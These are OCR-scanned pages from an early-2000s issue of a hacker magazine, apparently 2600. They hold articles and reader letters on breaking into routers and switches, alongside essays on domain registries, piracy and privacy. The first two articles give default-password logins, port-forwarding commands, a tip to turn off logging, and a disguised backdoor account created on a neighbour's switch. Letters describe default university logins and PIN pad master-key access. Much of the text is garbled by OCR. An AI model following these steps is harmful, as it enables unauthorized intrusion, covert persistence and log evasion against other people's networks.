lo browse / via the browser - no luck. The front 
door was impervious. But I asked myself if some- 
une had set up the "back door” with the same at- 
tention to detail. I surfed to 
whatismyipaddress.com and got the IP address. I 
mude a note of it on my PDA. Back in the lab, I 
poked around. The IP addy turned out to be a DSL 
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router doing network address translation (NAT) for 
the cafe's machines. This is a pretty common 
setup, since it’s cheap and secure - tf it’s set up cor- 
rectly. Emphasis on the last part of the sentence. 
g00gle@ perciplex:200gle {2035} telnet 
63.228 XXX XXX 

Trying 63,228. XXX. Xxx... 

Connected to 63.226. 1.00044. 

Escape character is “I. 


Flowpoint/2200 SDSL [ATM] Router fp2200-32 
v3,5.1 Ready 
Login: 
Lessee, could that be on a default password 
list? I surfed to www.phenoelit.de/ dpl/dpl.html 


(this site 1s threatened by the DMCA, incidentally) 
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and saw the default immediately: admin (sad, but 
true). 

Login: AAEE 

Logged in successfully! 

Now what? I had to figure out a way to do 
some port redirection so that the Flowpoint would 
forward specific service traffic to the same port on 
internal, NAT ed hosts. After some Google (abjus- 
age, | did: 

# dhep list 

and saw the IP pool of reserved, non-routeable 
addresses handed out to the cafe clients upon issu- 
ing a DHCP request. I chose one of the IPs and is- 
sued the command which would do the port 
forwarding from the Flowpoint to this particular 
internal IP address and port. 1 chose ftp since it 
comes enabled on many linux distros. 

# rem addServer 192.168.254.19 tcp ftp wan 
# exit 

Now I tried to connect to the masqueraded 
host: 
sigle@ perciplex:pU0ele [206] ftp 
63.228. XXX. XXX 


Connected to some.cybercafe. hast 


220 some.cybercafe.host FTP server ready. 
Name (some.cvbercafe.host:pU0ele): 

Woohoo! It worked. From here, I could do any 
number of things which I will leave to your imagi- 
nation. Note that in getting to this point, I did not 
change the Flowpoint admin password, muck with 
DHCP leases, or generally cause unwarranted 
chaos. I also took the time to restore the service to 
its previous unforwarded state when I was fin- 
ished: 

# rem delServer 192.168.254, 19 tcp ftp wan 

If you try this for yourself, remember not to 
choose telnet as the forwarded service, or you will 
lose communication with the router on subsequent 
connects, It would also be wise to temporarily turn 
logging off prior to exploration of the Flowpoint 
OS: 

# system log stop 

Although this example worked for a cybercafe 
setting, you will encounter similar setups else- 
where since many people 1) trust NAT blindly and 
2) are too lazy to change default passwords. It 
should be easy to do this for Cisco DSL routers as 
well. 





by Chris Byrnes 
JEAH Communications, LLC 
hitp://www.JEAH.net 

A few years back, the government split up the 
monopoly Network Solutions held on the registra- 
tion market. Now, at that time, they still allowed 
Network Solutions to control the global registry 
(the thing that all competing registrars report back 
to so all the data is kept in sync). As you may 
know, Network Solutions is now owned by 
VeriSign. 7 

Our good friends at VeriSign not only operate 
two registrars (registrars.com, and Network Solu- 
tions), but also this central registry called 
"VeriSign Global Registry,” Lots of domains have 
been expiring in the last few months as people for- 
get to pay their bills, dot com companies flop, ete, 
When these domains expire, they are supposed to 
be deleted within a maximum timeframe of 30 to 
45 days. Otherwise the registrar must pay an addi- 
tional registry fee to keep the domain active. (No 
registrar will do this if they don’t get paid by the 
client, of course). This is all according to the 
global registry policy. 
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Let's do a WHOIS lookup on a domain I know 
is expired, because I’ve been trying to register it: 
skullbocks.com. skullbocks.com, of course, was 
the domain name used in the popular movie "An- 
tiTrust." This domain ts registered at Network So- 
lutions and it says "Record expires on 
05-May-2001." So I contacted VeriSign and asked 
why the domain hasn't been deleted yet. No re- 
sponse. 

I spoke with an official ata competing registrar 
who told me, "VeriSign essentially is allowed to 
break its own rules, lt just says that it pays itself 
the additional registry fee to keep the domain 
alive. In all honesty, VeriSign could continue to 
hold onto as many expired domains for however 
long it wanted, and never be breaking the registry 
rules.” 

ICANN, the non-profit corporation that was 
formed to assume responsibility for the IP address 
space allocation, protocol parameter assignment, 
domain name system management, and root server 
system management functions, has yet to adopt a 
policy that supersedes the policies put in place by 
VeriSign in this matter. 


———— e 
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by Javier O, 
javib3 yahoo.com 

Lam writing this article because many admins do 
not seem to grasp the importance of security, espe- 
cially "inside" security, Last summer I moved into 
some new apartments here in beautiful west LA. 
About a month later we decided to hook up our place 
with DSL, so we placed a call and scheduled an ap- 
pointment, Weeks later we had DSL. As soon as the 
techs were done with the installation, | busted out my 
LinkS YS switch and a couple more hubs and hooked 
my Whole place up. First thing I did was an IFCON- 
FIG to get my IP info. I noticed that we were on a 
DHCP based service and that we were nol the only 
ones on the same network segment. | decided lo se- 
cure both of my roommates’ Windows boxes, unshar- 
ing the drives, setting passwords and permissions for 
files and printers, When all that was done I checked 
my Linux box. | was curious to see what else was in 
our same segment, so | busted out the trusty NMAP 
(WwWW.nmap.org) scanner and did a: #>nmap ñO 
142.168.0/24 > results. That way it would scan the 
whole network based on a class C address and the re- 
4ults from the scan could be saved to the file “results”. 
As expected, 192.168.1.1 and 192.168.1,2 were inter- 
esting. The first one belonged to a Cisco router and 
ihe second address belonged to a 3com switch. So I 
did a quick telnet to the switch and didn’t get a 
prompt, So I hit the ENTER key twice and bam! I got 
a Login prompt. 3com switches by default have no 
password set, According to the manual, you are sup- 
posed to set one upon installation... tsk, tsk. So I typed 
in “Admin” with no password and I got the following: 


hein: admin 
Password; 


Menu options; ——3Com SuperStack H Switeh 1100—— 
cHhernet - Administer Ethernet ports 

ip - Administer IP 

lovout - Logout af the Command Line Interface 
vimp - Administer SNMP 

Warem - Administer system-level functions 


lype * for help. 
Switch [100 (/)—____———_——_ 


lech menu option: 


o | went to the Ethernet menu and checked the sta- 
ustes on all the ports. Of course they were all set to 
hall duplex. 501 quickly ran IPCONFIG again on my 
computer and got my MAC address, That way | 

wuld check the tables on the switch and find out 
what port I was assigned to. I found my MAC ad- 
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dress matched with the MAC address in port 18. My 
roommates’ MACs also matched port 18. So I went 

back to the switch and decided to change our port to 
full duplex. | logged in and typed: 


>ethernet <enter> 
>poriMede <enter> 


Next it asked "what port?" So I typed 18 and then it 
asked to entera value. 


Select Ethernet port (1-26): 18 
Enter néw value (1 Ghalf, |Ofull) g 10fll}: 


| entered "1Ofull" and was sent back to the main 
menu. | doublechecked my work and port 15 was al 
"10 full”, Cool! Next I would create an account for 
myself, just in Case an act of faith occurs and the ad- 
min decides to check his network and devices. Trying 
lo make the account not seem suspicious, I named it 
“system and gave full access to it. Before: any 
changes take place you have to reset the switch, which 
can be done remotely, Now by doing some bandwidth 
tests, [ see some improvement on our connections. IL 
is not a huge difference since all | did was double the 
throughput of the port (full duplex doubles the 
throughput of a link), so the bandwidth and other net- 
work. traffic was still the same. But at least it helps. 
Now the other IP address (192.168.1.1): | was able to 
telnet to the Cisco router and get low level access. 
Nothing really useful but by running the command: * 
>show version” I can see that it is a Cisco 2600, The 
only way to get root that I know of requires physical 
access to the router, Hmm... I guess I can look around 
my building next time I take out the trash. There are a 
lot of other security issues with this setup, like the 
ever famous "file and printer sharing” by Microsoft. 
All Thad to do was open up "My Network Places” and 
choose a workgroup (about five exist on my segment), 
then just see what hosts offered what services. It was 
really kinda easy to do a "net use x: Wpaddressic$" on 
my computer and mount some person’s drive since 
Windows by default shares \c$ and \IPCS. But I was 
more interested tn the switch and router than snooping 
around other people's drives. 

As admins and enthusiasts, always secure your 
shit from both sides and never trust the users. 

Shout outs to: Happydren, Alezzz, Escorpion, lit- 
figsunshynge, my Family and to all my other pitas! 
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L wrote my own letter: 

"Back when I was in high school, | read magazines 
about computers and software. Then | started building 
my own computers from parts salvaged from friends’ 
old computers plus whatever 1 had to buy to put every- 
thing together. 

"I would also sometimes “borrow” software which 
L could not afford to purchase. While this was illegal, it 
is a badly kept secret that this can sometimes greatly 
help vendors of the most expensive software to have it 
widely available to people interested in learning the 
software. They then go to work for companies which 
buy hundreds or thousands of copies. In fact, some of 
the most expensive creative software is now being 
given away free to non-business users for exactly thts 
reason. 

"If I hadn't gotten that experience I wouldn't have 
the great job and career I have today. I am now well 
paid and therefore have quite a bit of disposable in- 
come which I use for software, new technology, and 
entertainment. 

"On the entertainment side, there have been dozens 
of reports showing that Napster actually increased al- 
bum sales, DVD, which most major studios initially 
tried to destroy in favor of a horrendous pay-per-watch 
format, has been the best thing to happen to that indus- 
try since the VHS machine (which you may recall they 
also fought). 

"Regardless of what is good for Corporate Amer- 
ica, for once please concentrate on what is good for the 
citizenry. There are laws on the books right now which 
clearly establish the right of a customer to make a copy 
of an item they've purchased for use in another format 
(ex. for transfer to a more portable system) or as a 
safeguard against damage to the original. These rights 
are being violated by members of the MPAA and espe- 
cially RIAA every single day, yet nothing is done. 

"I ask that you not only prevent the likes of the 
SSSCA, but that you look into the continued routine 
violations of customers’ fair-use and other rights, un- 
fair business practices, and price fixing by the compa- 
nies evens SSSCA." 


ii If aA pébple to 
sending letters. in th | d 
even making plore to talk wa 
cials, it would definitely make a nor Since this 
letter was sent, the SSSCA has been renamed the CB- 
DTPA (Consumer Broadband and Digital Television 
morion Act). Keep updated and spread the word,- 
it really ouronly Hane 4 id a 
N y ie 
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Corporate 'Corfuplion 


Dear 2600: 

| received a rather interesting mailing today from 
MCI. The letter, which is attached to a couple of plas- 
tic cards; advertises a new service allowing MCI sub- 
Seribers. to dial homey using a toll-free number 
(1-800-484-6236) “and a four-digit code. Each call 
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costs 35 Cents an «plus a 26 cent access charge if 
the numberis ‘dialed tiom a payphone. Interestingly, 
the card is” "MireadyWlttivated and no Password is 
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g phon and q 
with elected offi- 


needed - just the four digit code on the card. Now, I got 
curious about this and dialed the number. When 
prompted for a code, | entered something random and 
the call began to ring through. Uh oh! This means any- 
one can dial into this system and hit random stuff, in- 
curring charges on unknowing MCI customers’ bills. 
According to MCI, "Your [calling cards| are ready to 
use right away. There's nó need to sign up for anything 
and no extra fee to pay [which, by the way, is not quite 
true]." 1 don't see much potential for abuse here, un- 
less you drop the card and some random individual de- 
cides to call you up repeatedly out of maliciousness - 
or, ás in the previous example, if some asshole just de- 
cides to go wacko dialing numbers. Neither of these 
things are likely to happen, I suppose, but | would be 
willing to bet that every number 0001-9999 rings 
through to a different individual's phone line. Misdials 
are bound to happen, and one person's mistakes are 
conveniently charged directly to another's bill. Not to 
mention that the service 15 a ripoff - the only possible 
use I can think of for it ts if you are at a payphone with 
no change and no access to a cashier or an ATM. Using 
a conventional phone card would be more economical 
in almost all cases. MCI is essentially charging you ex- 
tra to dial your own phone number by way of an inse- 
cure, fawed proxy system thal is unnecessary about 99 
percent of the time. The ad sheet should have read, 
"Make long distance prank phone calls - and charge 
them to someone else!" I'd go for that (sarcasm). 
~toaste66 
To put this kind of a "feature" on someone's phone 
line without their permission is, at best, extraordinar- 
ily sleazy on MCI’s part. 


Dear 2600: 

In your response to DarkBlayd (18:4), you state 
that you don't see how it's possible for Radio Shack to 
lose money if someone elects not to activate a piece of 
hardware that they've bought (such as DirecTV). One 
word: kickbacks. I worked for the Canadian arm way 
back when cell phones first came out. Radio Shack, as 
well as the competitors, sold cell phones at or below 
cost. We got a percentage of the money the airtime 
package cost custsally around $300). I was directed to 
no a phone un customer activated it in the 
One ¢ [my Mame ker "forgot" 


vidicón 

If it’s clearly understood that an item is onty for 

sale if it's activated, that’s one thing. It’s quite another 

if it's simply sal inte ie a certain price and then all 

sana info is. ar reps als sale as 
for getting it at dl | prem F 


a i 
4 a Li = ay atin 














am writing this letter in order to inform you so 
you can inform the public. Recently all 
Comcast home (around 500,000) users were transi- 
tioned to comeast.net. Without warning Comcast cut 
the service levels @home users were getting in half. 
They have also created connectivity issues with the 
poorly executed network and their privacy invading 
proxies that aren't even able to be user-disabled, After 
all this the price is still rising. | pay the same amount 
for less than half the service. Comcast doesn’t even 
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have a news server set up. Also, the upload cap they 
have set in place has made it difficult to even down- 
load simple files. "ve gone on below to list why this 
proxy setup isso bad. 

|) Access to IP restricted resources is disrupted. In 
vrder to facilitate access to HTTP IP restricted re- 
sources, | must allow the Comeast proxy server to ac- 
cess these resources. If L allow the Comcast proxy 
server to access these resources, | inadvertently allow 
ny other users of the proxy server access as well. 

2) There is no check and balance on Comeast/ATT 
in how they implement the Inktomi Traffic Edge soft- 
ware or what they do with the information they gather, 
oreven what information they do gather. 

3) Customers were not notified of the change in 
service. 

4) The Comeast call center was ignorant and un- 
aware of the change in service. 

5) Software which would defeat the intended pur- 
pose of the proxy server (Virtual Private Networks) is 
forbidden to be run or implemented by residential 
Comcast customers per the Comcast Acceptable Use 
Policy and Subseriber Policy. 

6) The Traffic Edge software has the ability to ex- 
clude IP addresses from participating in the proxy. | 
should be given the opportunity to opr our of this "ser- 
vice" (I should have been told I was epted in to some- 
thing in the first place). 

On top of all this you have no other choice if you 
want cable Internet access. If Comcast is In your area, 
they are your provider. Not to mention that Comeast, 
the number three biggest cable provider in the nation, 
hought AT&T Broadband, the number one biggest 
provider. Comcast has bought out almost all the little 
providers over the years. Now you have Comcast from 
Philadelphia to Miami. There is no competition. It’s 
easy to tell Comeast has no desire to make things bet- 
ler, The only desire they have is to drive up prices by 
wiving less and less service and charging more and 
MOTE. 


Robert Williams 


Dear 2600: 

During the Grammys a representative of a record 
company spewed for about five minutes on how the 
‘musie food chain” is in danger by people who down- 
load and pirate music. Throughout the entire spiel he 
was making false accusations, saying that every kid is 
downloading music on the computer behind their par- 
ents backs, able to download 6,000 songs in three 
days. Come on! I live off a shit 56k connection. There 
inno way | could even start on that number! He was all 
concerned about how the artists will not receive their 
money when they make about $2 off every CD while 
ihe rest is sent to record companies. It seems he is 
more worried over his money than the "music food 
chain.” Give me a break! 

eOd3wrick3r 

It would be interesting to ask this euy if he actually 

Hhought someone would buy that amount of musie ina 


record store. If that figure is anywhere close to true 


(and wedon t believe it for ananosecond), they should 
he happy that people are taking an interest in their 
product and busy thinking up ways to exploit that in- 
terest. In reality, the musicians are being horribly de- 
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ceived and taken advantage of by their own record 
companies. A recent “settlement” with online music 
distributors resulted in money going to the record 
companies - and nothing to the artists, We weren't a bit 
surprised but a lot of musicians were. 


Dear 2600: 

lt appears Disney is starting young with its brain- 
washing (not that Um surprised). My girlfriend was 
flicking through the channels tonight and started to 
watch this cartoon on the Disney Channel called "The 
Proud Family.” It featured this young kid in a black 
trenchcoat (a Matrix spoof) enticing his young girl- 
friend to download free music from his website. She 
complied and then turned into this crazy music-down- 
loading freak. This eventually led to her arrest and be- 
ing banned from the use of her father’s computer. 
Later she was again enticed by her misguided black 
trenchcoat-wearing friend (who is obviously Disney's 
demented impersonation of a hacker) to download mu- 
sic again, This time, instead of her arrest, she finds at a 
local CD store that all of the CD’s are gone, leaving 
the store owner broke. Her music downloading is to 
blame (of course), Not only is he out of business, but 
various people are out of jobs who have nothing to do 
with the music industry. At the end of the show she 
tells this oh so evil hacker kid that downloading music 
is stealing and to go away. Of course the show ends 
with her getting a great big hue from her mom telling 
her she did the right thing. 

nomotion 

Should anyone be surprised at this kind of propa- 
ganda when such corporations practically own the 
airwaves in this country? And the only reason we even 
say "practically" is because, at least on paper, the air- 
waves still belong to the people and can be taken back 
if the current holders are deemed unworthy. This ap- 
plies to cable outlets as well. 


Dear 2600: 
| was reading through an article today and the 
headline read "Moviegoing Set Record in 2001." Ap- 
parently the movie industry had the highest grossing 
year in 2001 since 1959. Now this strikes me as odd 
because there have been so many news articles about 
how the MPAA is losing billions of dollars each year 
to movie piracy, I went looking for one of these arti- 
ches, and found in one a quote | thought was interest- 
ing: "Claiming that the movie indusiry is losing $3 
billion annually through theft of its product in one 
form or another, [Jack] Valenti said that what was now 
happening could ‘disfigure and shred the future of 
American films’ because of the ease with which films 
can now be copied and transported on the Net.” 
Dash Interrupt 
We're becoming. increasingly convinced that 
there's a parallel universe MPAA that's adversely af- 
fected by these things. There's really no other explana- 
tion ax to haw they can mak such epietrica!!y 
apposed statements and sb Mera both 10 be tree, 
Other than perhaps! someone Delia 
honest, that ds. Yeah, wel go 
verse theory. Pa 












Dear 2600: 

Yesterday my Business Tech class had a rather 
lengthy debate on the issue of open source. We also 
discussed the controversial "sharing" of files through 
services like Napster, Kazaa, and Morpheus. I've al- 
ways liked getting stuff for free through those services, 
but P ve always sort of been on the fence on that topic. 
Until yesterday. We were right in the middle of this big 
discussion and | was being uncharacteristically quiet. 
Then something deep inside of me woke up. I realized 
something. People say that these services are killing 
the recording industry. 1 say Jet them kill it. Destroy 
the establishment, Kill all the record companies and 
movie studios, You can't kill art so it will go on with- 
out them. Only instead of having poppy little pieces of 
shit like Brittany Spears and Warner Brothers, you'll 
have an underground coalition of artists, producing 
their work in their basements and sharing it with the 
world for little or no money via the Internet. They'll 
have day jobs and still continue to produce their art be- 
cause they truly believe in and love it. Forget about 
money, lose your self image. Indulge your passions, 
embrace your art. Free your mind, and take down the 
een 
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Dear 2600: 

Your contributor "angelazaharia” is most griev- 
ously mistaken in the article "Behind the Scenes on a 
Web Page” (18:4) when asserting that Akamai pro- 
vides its image delivery services “free of charge.” | can 
assure you that they do not. At least not intentionally. 

Akamai is a "content delivery network." They op- 
erate an "edge network" of object cache servers, plac- 
ing them in hundreds of NOCs around the world 
(though mostly in North America). The long URLs at- 
tached to "akamaized” images, PDFs, streaming media 
files, and other web page components are actually spe- 
cially assembled URLs that include a cache rule, a 
timestamp and/or fingerprint of the content cached, 
and a señal number that identifies Akamai's customer 
(the web site thal owns the component - Wired/Terra 
Lycos in the case of the article’s web page). Akamai 
caches copies of the "heavy" items on a web page on a 
network of servers, and then uses its own proprietary 
algorithms to identify which of the edge servers is 
closest (in a network sense) to the end user, and then 
delivers the content from that server, 

This is meant to improve the response time for 
building a complicated web page by limiting the num- 
ber of network hops. that heavy content needs to tra- 
verse to reach the end user, It is also supposed to lower 
the amount of server hardware that a media company 
like Terra Lycos has to invest in themselves by limiting 
the number of requests that come to the site’s origin 
servers. The media company pays dearly for this ser- 
vice - In my experience up to four times the cost of 
bandwidth» wavailable from the typical bandwidth 
provider at a colóc atiomcenter. Whether the supposed 








format of an "ARL” (Akamai Resource Locator) can 
piggyback their own content on a paying Akamai cus- 
tomer’s account. Like | said, they don't intentionally 


-give their bandwidth away for free. 


The author implies that Akamai makes its money 
by some form of underhanded distribution of end-user 
data. That has not been my experience. They have no 
problem selling the data back to the web site owner, 
but they do not cross-sell this information between 
firms, as that would be a quick way to get themselves 
sued out of existence, not by the end-users, but by the 
media companies themselves. 

And the author's supposed shock at lycos.com 
cookies and URLs sprinkled about a wired.com page 
should be no surprise at all. Wired News is simply a 
brand owned by Terra Lycos. Of course they are going 
to track your activity on their entire family of sites. To 
those folks, you're not browsing separate sites. You 
are merely browsing different "properties" owned by 
Terra Lycos, It is a rare media company that operates a 
diversity of sites and does not do this kind of thing. Of 
far, far more concern is third-party traffic watchers like 
DoubleClick. 

MSM 
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Maybe because I work in advertising, maybe be- 
cause I have more training in economics than the aver- 
age bear, maybe because I know people who work for 
firms like doubleclick.net, but maybe because I like 
free goods and services, is why | have to complain 
about all the derisions against doubleclick, akamai, et 
al. 

Yes, these firms do invade privacy, They track a 
unique identifier - “you,” as it were, and they know 
when you have been siceping, they know when you re 
awake, etc, But these firms do not pose a threat against 
us. 2600 readers should have an affinity for how things 
work and should know how to get around them. To 
avoid ads without overhead go to 
http://www,yoyo.org/—pgl/adservers/ and edit your 
hosts file, Turn off cookies, or use cookie management 
software, or just do it yourself to your temp folders 
from time lo time. 

These firms provide their clients - websites like 
wired, for example, with the revenue that allows them 
to go on publishing free news on their website. If you 
use any of the ubiquitous free services, like weather, 
news, e-mail, etc. - services that not more than ten 
years ago cost real money, you have firms like dou- 
bleclick and akamai to thank for it. 

I'm not saying that should open your system up for 
these firms to pick through, by no stretch of the imagi- 
nation. But insofar as online privacy is concerned, the 
real "bad guys” are firms that produce things like the 
infamous BDE installation engine, CometCursor, and 
others that surreptitiously track your movements. We 
all know that doubleclick tracks online activity - that's 
what they do. They are not hiding behind a file sharing 
protocol, or a web site “enhancement.” A little bit of 
privacy is the price of admission to premium content 
sites. And there is a worse case scenario. A subscrip- 
tion based Internet would give you even less privacy 
because now they would have a name, address, and 
credit card number to match up with a browser's 





MIn wèb page | performance is worth the 
exorbitaijt costs, ( at feast:for simple object delivery) is 
a matt ees il deba 

As'an added bongs, ‘anyone who can Sigue out the 
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unique global identifier. Knowing this, instead of run- 
ning at the mouth at how "evil" these firms are, put up 
and shut up. As long as all of doublechek's URLs are 
pointed al 127.0.0.0, they don't know me, and [don't 
care, 
Kurt Winter 
Some good points, but what happens when they de- 
vide they're tired of people like you who bypass their 
racking software? Perhaps they will even make it a 
crime. Stranger things have been happening. We feel 
people should at least have the option of deciding if 
they want to play by these rules. By letting people 
Know few they work and with some of the information 
vou 've provided, people are better armed to deal with 
this, But just because these moneymaking firms are 
convinced that this is the only way the net can be run, 
it doesn t make it so. We should always be striving for 
wavs to provide information and services to the masses 
in ways that arent offensive, intrusive, or expensive. 


Dear 2600: 

In the article "Basics on Answering Machine 
Hacking” in 18:4, Horrid presented a 1005-digit se- 
quence that contains all the 3-digit numbers between 
000 and 999, He asked for another such sequence that 
tw shorter. Well, it may be a bit simplistic but if he re- 
moved the two trailing zeros from his sequence and 
wided a 9 at the beginning, it would be shortened by 
one digit while still containing all the numbers. It is 
well enough to use a computer to generate a number 
wequence, but one should exercise a little reasoning as 
well 

ascii32 

You managed to shorten it but your triumph isn't 

going fo last very long.... 


Dear 2600: 

Hornd’s string for accessing answering machines 
with 3-digit passwords is almost perfect, The minimal 
length for such a string is 1002 digits, not 1005. (In 
general, the length of a skeleton key for an answering 
inachine code of length n is 10%n+n-1.) In order to re- 
move unnecessary repetition from Horrid's string, 
‘nply remove positions 999, 1000, and 1001. (The 

4899900 at the end of the string becomes 9900.) 
ted 

If you combine this with the previous letter's idea, 

vow can get this dawn to 1001. 


Doar 2600: 

After reading the article in 18:4 entitled "Examin- 
ing Student Databases,” I'm surprised that Screamer 
Chantix wasn't aware that most universities have some 
kind of student/faculty database that’s available for the 
school's use. Now what is amazing is that my school 
(which shall remain nameless to protect the innocent) 
has this information publicly available to everyone 
with just a short jot on the URL. Now it 's just a good 
iung that Chaotix's friend's student ID isn't his SSN 
ihe itis with other schools (imagine the fun), Now the 
option to change it does exist, but it is one of those 
itngs that the school information technology depart- 
ment forgets to tell you during orientation. 

P4R4d0x 

Cut by us, the State University of New York at 
von Brook has a system called SOAR CSEE On- 
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line Access to Records) that notonly keeps information 
on students (transcripts, addresses, phone numbers, 
ete.) but on all alumni, often without their knowledge. 
The username is the SSN (easily obtained as it's also 
the student ID which is printed on everything from 
term papers to grade postings) and the password is the 
six digit birthdate (also easily obtained or easily 
guessed). Those few individuals who managed to fig- 
ure out how to change the password in the past will be 
delighted to learn that they apparently revert back to 
the default after a certain amount of time. It's said that 
a new system called SOLAR is about to be launched. 
Let's hope the added L somehow brings security. 


Dear 2600): 

A year ago, I picked up a copy of 2600 and was 
very fond of the information found. It was something | 
could read and not cringe at. Fast forward to today and 
all I see are articles on “right click suppression” and 
"building a wooden computer.” Not to mention that 
many letters are angst filled piles of jealousy and stu- 
pidity from high school nitwits. What's happened to 
2600? It seems to have been going steadily downhill, 

Also, in regard to the letter about the Libertarian 
Party, your assumptions are wrong. Libertarian beliefs 
are founded upon freedom for both the individual and 
for the corporation, as well as the behef in personal re- 
sponsibility. Corporations are not always honest or 
ethical, and the goal of Libertarian views is to prevent 
the corporation from impeding upon the citizen (mak- 
ing laws like the DMCA null), and allowing the citizen 
freedom from the state, socially and economically. 

Scott 

Usually when we're accused of going steadily 
downhill, it’s for a longer period of time than a year: 
Perhaps you meant to accuse us of a sharp decline? As 
for Libertarian beliefs, it all sounds great except for 
the fact that it doesn't work. [fa government lets huge 
corporitions write the laws (such as in the United 
States today), it’s litle different than there being no 
government at all to keep the corporations in check 
It’s only in these places where governments actually 
represent the people that there’s even a chance of 
keeping the corporations from systematically abusing 
the power that inevitably comes from being huge. 


Dear 2600: 
This is in response to "Right Click Suppression" 
(18:4) by Rob Rohan. The nght click suppression is 
not really a problem and it is in fact quite easy to by- 
pass by non-intrusive means. For example, to copy 
pictures from the site onto the clipboard, you don’t 
need right click. Use Internet Explorer (lets you high- 
light images) and just highlight the image (or whatever 
else you wanted to right-click on) using the left mouse 
button. Then simply press the Microsoft context-menu 
key (the key between CTRL and ALT on a standard 
104-key keyboard - it's next to the Microsoft logo 
key). Most people I know find this key to be useless, 
and some even nn it. But de Y bebe 
key is quite a if used to your ¿ 
people who don’ t have" is y 
can simply highhght the pretur 
tion: Esit-Copy to cépyit 
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| think this is considerably easier than writing a Java 
program to save the picture. 
Emre Yucel 


Dear 2600: 

Another way to capture a web page is to simply do 
File, Edit Page in Netscape Communicator. | did this 
fora web page that had photos on it and it worked like 
a charm, 

InternetGoddess 


Dear 2600: 

In your 18:4 issue in the article "How to Hack from 
a RAM Disk” by Nv, the author recommends destruc- 
tion of CD media: "If you're really paranoid, you can 
torch/incinerate the CD. T ve heard nuking the CD in a 
microwave is not 100 percent successful in destroying 
data (and it stinks!)." . 

[I would like to note that these examples of destroy- 
ing CD media are dangerous - fire could get out of 
control. | hope no one would actually place CD media 
in their microwave. There are also some companies 
that sell what they term degauss devices that effec- 
tively act as belt sanders and grind the CD media until 
you are left with dust and a plastic dise, I have recom- 
mended my company not purchase these devices as 
they are both expensive and unnecessary. 

Recently I found, purely by accident, a very effec- 
tive and inexpensive way to destroy CD media without 
the use of any machinery or heat. | had inadvertently 
placed a compact disc in a solution of Purex Bleach. 
Twenty-four hours later 1 found the disc transformed 
to a bath of metallic flakes and a plastic disc. The 


pio a have taken less than 24 hours; to dissolves 








the aétual metal coating on the plastic dis, but i it was 


in the bleach solution... | | e e 
+ K! ¢ Y 


heard of lately. 


Tracking Terrorists 


Dear 2600: 

| wanted torConment, ona reply: 
read@y t's letters. You stated to someone basic 
trying to hack Bin Laden was a Stupid. sa | a 
necessarily agree Sure, it comlllebe: wo: si but 
cracking into his bank accounts and such forth would 
actually do some good whether you believe it's a stu- 
pid thought or not. It would also be helping the Amer- 
ican cause a lot if the hacker community united and 
did something for the sake of our country. We bitch 
and moan about how much we hate our country, yet we 
were all angered by the events in September and all 
were united to help everyone. I mean, it’s very possi- 
ble that the government themselves are trying to crack 
into Bin Laden’s accounts. 






Chris 

~ First of, we don'ts “bitch and moan about how 

ka We hate’ our country" We bitch and moan about 
those who. continue ibvert the principles of democ- 

racy and | gel, away Wiha, all the while masking them- 

selves in patriotic for Second, when was the last 
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time you “cracked into a bank account,” let alone that 
of someone who's on a most wanted list - or in this 
case on ALL of them? It’s net like on TV and way tea 
many people seem to think that it is. This leads to the 
perception that hackers can be used as same sort of cy- 
berarmy, which is about the furthest thine from the 
truth. Anyone with even a slight familiarity of the 
hacker world would know that we're constantly ques- 
tioning, disagreeing, exploring, and getting into trou- 
ble. Net exactly the kind of peaple wha would do well 
in a military environment, (We happen to hear from a 
sizable number of unhappy hackers who somehow 
wind up in military service.) Finally, even if it were 
something simple, where do you get the right to be the 
judge, jury, and executioner? Imagine if everyone toak 
itupon themselves to impose their brand of justice in 
this manner. If you really want to help, the best thing 
you can do is be observant and notice things that other 
people may not notice. Then let people know what you 
see. In this age where the truth is fleeting and mass 
manipulation is common, the ability to detect when 
something doesn't make sense is a valuable one. 


Dear 2600: 

Pm writing to disagree with your analysis that the 
government should release an original digital version 
of the bin Laden tape. Apparently all digital video 
tapes have special "markers" for things like time, cam- 
era lens settings, etc. It seems silly to think that our 
government is good enough to fake bin Laden's image 
and voice, but can't fake a few digital markers to go 
along with that. The government didn't have to release 
any evidence al all, so be lucky you got any. If you re- 
Lit, then reject i but don't expect them to pander to 
| T ve uo 3 






A Dan 
“They | oe to release any evidence at all? 
What kind of world do you live in? It is the obligation 
of thinking people everywhere to question and analyze 
mithort relying on blind faith. Almost every major con- 
flict in the wor — be traced to people who refuse to 
poe of seeing something they 
dont es 4 sée. AS pe le with a technical knowl- 
edge Df su things. it was a lot more than a mere 
Him" for us to Want TO See the timecode of the tape. 
There were numerous details attesting to the authentic- — 
itv that could have been garnered by seeing these val- 
ues, While they could have been faked, it would take 
an extraordinary amount of effort and time to get all of 
them just right. That's why their release in a timely 
manner was so essential. And it’s a perfect example af 
how hackers can help in these troubled times - by us- 
ing some technical knowledge to let the world know if 
something makes sense or not. Of course, to do this 
properly you have to accept the fact that you dont 
know the answer until you analyze the data. It’s puz- 
tling and quite disturbing that the United States rov- 
ernment wouldn't want this evidence to be known. But — 
what's even worse is when people close their eves to 
the mere possibility that the facts dont add up. 
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Right Click Suporesse 


by Pete 

The purpose of this article 15 lo provide an ex- 
tension to "Right Click Suppression" by Rob 
Rohan in 18:4. 

Blocking nght-clicks, whether on the entire 
page or just images, is growing more and more 
popular as a form of weak copyright protection. 
|'ve encountered sites attempting to prevent me 
Irom saving material copyrighted by people other 
than the owner of the page! 

In addition to the methods mentioned by Mr, 
Rohan, Windoze users can click on an image and 
rag it from the browser to their desktop or another 
folder to copy the image. Linux users can try the 
provided seript. 
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nm “Finished”; 





The Script 

The script Isninja.pl is designed to get around 
that kind of right-click protection without having to 
root though the source yourself. Supply it with a 
few URLs and it will print all of the scripts (includ- 
ing the one used to Block your meht-clicks) found 
on those pages, along with the URLs of the images. 
Optionally, it will download the images and put 
them in the current directory, If you want to down- 
load the flash presentations, the midi music, or 
whatever, it would be fairly easy to add that to the 
script. In the absence of wget, Mr, Rohan’s Java 
app would also work well. [had to dust off my Perl 
skills for this, so please forgive me if it’s a bit 
sloppy. 
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by dual _parallel 
dual_parallel € hotmail.com 

In this article I'll discuss some variations in a 
common pin pad, a couple of hacks at a large re- 
tailer, and finally a disturbing trend. 

In my last article I discussed the VeriFone 
PinPad 1000 and the button presses (all simulta- 
neous) needed to access the Master Key, or Mkey. 
Variations exist. Some pads are set lo access the 
Mkey by pressing the bottom right and top right 
buttons. But the vast majority are set to access the 
Mkey by pressing the bottom right and top left 
buttons. 

The last article discussed Wal-Mart. This arti- 
cle will discuss its failing competitor, Kmart. The 
pin pads at every Kmart register are Checkmate 
